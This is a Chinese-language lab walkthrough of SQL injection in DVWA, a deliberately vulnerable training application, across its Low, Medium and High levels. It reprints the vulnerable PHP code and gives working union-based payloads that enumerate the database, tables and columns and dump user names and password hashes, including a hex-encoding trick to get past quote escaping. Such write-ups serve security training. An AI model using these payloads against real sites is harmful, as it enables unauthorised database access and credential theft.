DVWA——SQL Injection（SQL注入）

if( isset( $_REQUEST[ ‘Submit‘ ] ) ) { // Get input $id = $_REQUEST[ ‘id‘ ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = ‘$id‘;"; $result = mysql_query( $query ) or die( ‘<pre>‘ . mysql_error() . ‘</pre>‘ ); // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; // Increase loop count $i++; } mysql_close(); } ?>

在DVWA上我们可以看到源码，其实这就很简单了，但是往往我们在注入过程中是看不到源码的，所以接下来的步骤是在看不到源码情况下来进行的：

 

1.判断是否存在注入，注入是字符型还是数字型

输入: 1  页面正常

 

 

 1‘ 页面返回错误

1‘ and ‘1‘=‘2 页面返回为空，查询失败

 

1‘ or ‘1‘=‘1 页面正常，并返回更多的信息，查询成功

 

 

 判断出来存在的是字符型注入。

 

2.猜字段

输入1′ or 1=1 order by 1 #，查询成功：

 

 

 1′ or 1=1 order by 2 #，成功。

 

 

 

 1‘ or 1=1 order by 3 # ，失败

 

 

 所以字段数为2。

3.确定回显点

1‘ union select 1,2#

 

4.猜数据库

命令：1‘ union select 1,database() #  或者  1‘ union select user(),database()--+

 

 

 

 得到数据库名：dvwa

5.猜表名：

命令:1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

 

6.猜列名

命令:1‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users‘#

 

7.猜数据

1‘ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

 

这样就得到了users表中所有用户的user_id,first_name,last_name,password的数据。

 

Medium级：

<?php 

if( isset( $_POST[ ‘Submit‘ ] ) ) { 
    // Get input 
    $id = $_POST[ ‘id‘ ]; 
    $id = mysql_real_escape_string( $id ); 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysql_query( $query ) or die( ‘<pre>‘ . mysql_error() . ‘</pre>‘ ); 

    // Get results 
    $num = mysql_numrows( $result ); 
    $i   = 0; 
    while( $i < $num ) { 
        // Display values 
        $first = mysql_result( $result, $i, "first_name" ); 
        $last  = mysql_result( $result, $i, "last_name" ); 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 

        // Increase loop count 
        $i++; 
    } 

    //mysql_close(); 
} 

?> 

这关使用了mysqli_real_escape_string函数对特殊字符进行转义，同时前端页面设置了下拉选择表单，希望以此来控制用户的输入。

所以这关需要抓包改参数：（我这里是发送到了repeater中改的）

 

1.判断注入类型：

更改参数id为1′ or 1=1 #  和 更改参数id为1 or 1=1 #

 

 

 

 

 

所以说明是数字型注入。

2.查询字段数 （因为前面有过程就不再赘述了，但是记住1后面没有了 ‘，现在是数字型注入了）

3.确定回显点

4.猜库名

5.猜数据库的表

6.猜列

我们发现到这一步按照上面的步骤失败了，为什么呢，原因就是我们前面说的这关特殊字符进行转义。单引号被转义了，变成了\’。

 

 

 这里我们可以利用十六进制进行绕过，抓包更改参数id为：1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #

 

7.猜字段

 

 

 

 

 

 High级：

<?php 

if( isset( $_SESSION [ ‘id‘ ] ) ) { 
    // Get input 
    $id = $_SESSION[ ‘id‘ ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id LIMIT 1;"; 
    $result = mysql_query( $query ) or die( ‘<pre>Something went wrong.</pre>‘ ); 

    // Get results 
    $num = mysql_numrows( $result ); 
    $i   = 0; 
    while( $i < $num ) { 
        // Get values 
        $first = mysql_result( $result, $i, "first_name" ); 
        $last  = mysql_result( $result, $i, "last_name" ); 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 

        // Increase loop count 
        $i++; 
    } 

    mysql_close(); 
} 

?> 

可以看到，与Medium级别的代码相比，High级别的只是在SQL查询语句中添加了LIIT1，他这么做为了避免程序中的条件变量有问题的时候造成全表update。

但是我们可以通过#将其注释掉。

 

High级别的查询提交页面与查询结果显示页面不是同一个，这样做的目的是为了防止一般的sqlmap注入，因为sqlmap在注入过程中，无法在查询提交页面

上获取查询的结果，没有了反馈，也就没办法进一步注入。（但是我们能够返回页面看到）

这关跟第一关一样差不多，直接给出结果了：1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

 

DVWA——SQL Injection（SQL注入）

标签：取数据   post   sql命令   bool   class   选择   黑客   prime   ring